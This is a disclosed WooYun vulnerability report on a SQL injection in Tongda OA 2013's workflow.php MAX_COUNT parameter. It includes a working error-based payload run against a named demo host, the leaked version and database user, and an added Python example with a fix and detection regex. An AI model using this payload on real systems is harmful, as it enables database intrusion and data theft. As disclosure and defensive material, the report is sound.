Vulnerability summary
Defect ID: wooyun-2015-0103304
Title: Tongda OA 2013 Enterprise Edition, a tricky SQL injection
Vendor: Tongda Xinke (通达信科)
Author: 路人甲
Submitted: 2015-03-25 15:32
Fixed: 2015-06-24 10:50
Published: 2015-06-24 10:50
Type: SQL injection
Severity: High
Self-assessed rank: 15
Status: Confirmed by vendor
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-03-25: Details sent to the vendor, awaiting vendor handling
2015-03-26: Vendor confirmed; details visible to the vendor only
2015-03-29: Details opened to third-party security partners
2015-05-20: Details opened to core white hats and domain experts
2015-05-30: Details opened to regular white hats
2015-06-09: Details opened to intern white hats
2015-06-24: Details opened to the public
Brief description:
Tongda again.
Detailed description:
Log in to the trial account on the official demo site:
http://www.day900.com
Injection point:
http://www.day900.com/general/mytable/intel_view/workflow.php?MAX_COUNT=15&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random
After appending a single quote:
Please contact the administrator
错误#1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
SQL语句: SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG,FLOW_PRCS,FLOW_NAME,RUN_NAME,FLOW_TYPE,LIST_FLDS_STR,FORM_ID from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' and DEL_FLAG='0' and PRCS_FLAG<>'1' and PRCS_FLAG<>'2' and PRCS_FLAG<>'3' and PRCS_FLAG<>'4' and PRCS_FLAG<>'5' and CHILD_RUN='0' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,15\'
File: /general/mytable/intel_view/workflow.php
The injection point is MAX_COUNT, but its value lands in the LIMIT clause, which follows ORDER BY, so a UNION there is a syntax error in MySQL; several attempts failed.
Finally:
Payload: 15 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
http://www.day900.com/general/mytable/intel_view/workflow.php?MAX_COUNT=15%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1)&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random
version() comes back in the error (the XPath error message carries at most 32 characters, which is why the version string is cut off):
错误#1105: XPATH syntax error: ':5.5.25-enterprise-commercial-ad'
SQL语句: SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG,FLOW_PRCS,FLOW_NAME,RUN_NAME,FLOW_TYPE,LIST_FLDS_STR,FORM_ID from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' and DEL_FLAG='0' and PRCS_FLAG<>'1' and PRCS_FLAG<>'2' and PRCS_FLAG<>'3' and PRCS_FLAG<>'4' and PRCS_FLAG<>'5' and CHILD_RUN='0' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,15 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)
File: /general/mytable/intel_view/workflow.php
The same trick returns user():
错误#1105: XPATH syntax error: ':root@127.0.0.1'
SQL语句: SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG,FLOW_PRCS,FLOW_NAME,RUN_NAME,FLOW_TYPE,LIST_FLDS_STR,FORM_ID from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' and DEL_FLAG='0' and PRCS_FLAG<>'1' and PRCS_FLAG<>'2' and PRCS_FLAG<>'3' and PRCS_FLAG<>'4' and PRCS_FLAG<>'5' and CHILD_RUN='0' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,15 procedure analyse(extractvalue(rand(),concat(0x3a,user())),1)
File: /general/mytable/intel_view/workflow.php
root@127.0.0.1
Proof of vulnerability:
See the detailed description.
Fix:
Filter the input: MAX_COUNT is only ever a row count, so cast it to an integer (intval) before it reaches the LIMIT clause, or bind it as an integer parameter in a prepared statement.
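The two points above, why MAX_COUNT is injectable yet resists the usual UNION payloads, and the filter-based fix, as an added Python example that is not the report's or Tongda's own code. The query skeleton is abbreviated from the error page quoted in the report; the four-digit bound on MAX_COUNT, the helper names and the third, single-quote probe URL are assumptions made here:

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Abbreviated skeleton of the query quoted in the report's error page; the
# only attacker-controlled part is {max_count}, which lands in the LIMIT
# clause after ORDER BY. USER_ID comes from the session and is fixed here.
QUERY_TEMPLATE = (
    "SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG "
    "from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE "
    "WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID "
    "and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' "
    "and DEL_FLAG='0' and CHILD_RUN='0' "
    "order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,{max_count}"
)

# A LIMIT value is a row count and nothing else (the 4-digit bound is an
# assumption of this example).
MAX_COUNT_OK = re.compile(r"[0-9]{1,4}")


def build_query_vulnerable(max_count):
    """The flawed pattern: MAX_COUNT is concatenated verbatim into LIMIT.

    A UNION cannot follow ORDER BY ... LIMIT of an unparenthesised SELECT
    in MySQL, which is why the usual payloads fail. PROCEDURE ANALYSE(...)
    is accepted after LIMIT on MySQL 5.x, and extractvalue() with a
    malformed XPath string leaks its argument through error 1105
    (32 characters at most).
    """
    return QUERY_TEMPLATE.format(max_count=max_count)


def build_query_hardened(max_count):
    """The fix: validate MAX_COUNT as a small integer before building LIMIT."""
    if not MAX_COUNT_OK.fullmatch(max_count):
        raise ValueError("MAX_COUNT must be a non-negative integer of at most 4 digits")
    return QUERY_TEMPLATE.format(max_count=int(max_count))


def hardened_accepts(max_count):
    """True if the hardened builder accepts the value, False if it rejects it."""
    try:
        build_query_hardened(max_count)
    except ValueError:
        return False
    return True


# Detection side: fingerprints of a LIMIT-clause injection on MySQL 5.x.
LIMIT_INJECTION = re.compile(
    r"\b(procedure\s+analyse|extractvalue|updatexml|into\s+(out|dump)file)\b",
    re.IGNORECASE,
)


def max_count_from_url(url):
    """Return the URL-decoded MAX_COUNT parameter of a request URL, or None."""
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if key == "MAX_COUNT":
            return value
    return None


def classify_request(url):
    """'clean', 'malformed' (not an integer) or 'limit-injection'."""
    value = max_count_from_url(url)
    if value is None or MAX_COUNT_OK.fullmatch(value):
        return "clean"
    if LIMIT_INJECTION.search(value):
        return "limit-injection"
    return "malformed"


# Sample requests: the two URLs from the report plus a constructed probe.
BENIGN_URL = ("http://www.day900.com/general/mytable/intel_view/workflow.php"
              "?MAX_COUNT=15&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55")
PAYLOAD_URL = ("http://www.day900.com/general/mytable/intel_view/workflow.php"
               "?MAX_COUNT=15%20procedure%20analyse(extractvalue(rand(),"
               "concat(0x3a,version())),1)&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55")
PROBE_URL = BENIGN_URL.replace("MAX_COUNT=15", "MAX_COUNT=15%27")  # constructed: 15'

if __name__ == "__main__":
    for url in (BENIGN_URL, PAYLOAD_URL, PROBE_URL):
        value = max_count_from_url(url)
        print(classify_request(url), "| accepted by fix:", hardened_accepts(value),
              "| vulnerable LIMIT tail:", build_query_vulnerable(value)[-70:])
```

The detector keys on the MAX_COUNT value rather than on the raw query string because the application only ever expects digits there; anything else is at least malformed, and the `procedure analyse` / `extractvalue` / `updatexml` / `into outfile` fingerprints are the few constructs MySQL 5.x accepts after a LIMIT clause.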
Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting.
Vulnerability response
Vendor response:
Severity: Low
Rank: 1
Confirmed: 2015-03-26 10:49
Vendor reply:
The 2013 edition was discontinued from sale long ago.
Latest status:
None yet.